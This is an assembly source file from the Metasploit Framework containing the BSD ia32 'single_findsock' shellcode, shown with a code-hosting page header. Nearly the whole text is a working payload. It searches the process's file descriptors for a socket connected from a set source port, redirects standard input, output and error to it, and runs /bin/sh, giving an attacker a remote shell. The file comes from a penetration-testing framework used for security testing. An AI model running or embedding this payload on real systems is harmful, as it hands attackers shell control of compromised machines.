metasploit-framework/external/source/shellcode/bsd/ia32/single_findsock.asm

72 lines
1.0 KiB
NASM
Raw Normal View History

;
;
; Name: single_findsock
; Qualities: Nothing Special
; Authors: vlad902 <vlad902 [at] gmail.com>
; Version: $Revision: 1846 $
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; Description:
;
; This payload redirects /bin/sh to a socket connected from a
; certain source port.
;
;;
BITS 32
section .text
global main
main:
xor edi, edi
push edi
mov ebp, esp
getpeername_loop:
; 32-bit is okay since the connection should be established already.
inc edi
mov esp, ebp
push byte 0x10
push esp
push ebp
push edi
push byte 0x1f
pop eax
push byte 0x02
int 0x80
cmp word [ebp + 2], 0x5c11
jne getpeername_loop
pop ecx
dup2_loop:
push ecx
push edi
push byte 0x5a
pop eax
push ecx
int 0x80
dec ecx
jns dup2_loop
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push eax
push esp
push ebx
mov al, 0x3b
push eax
int 0x80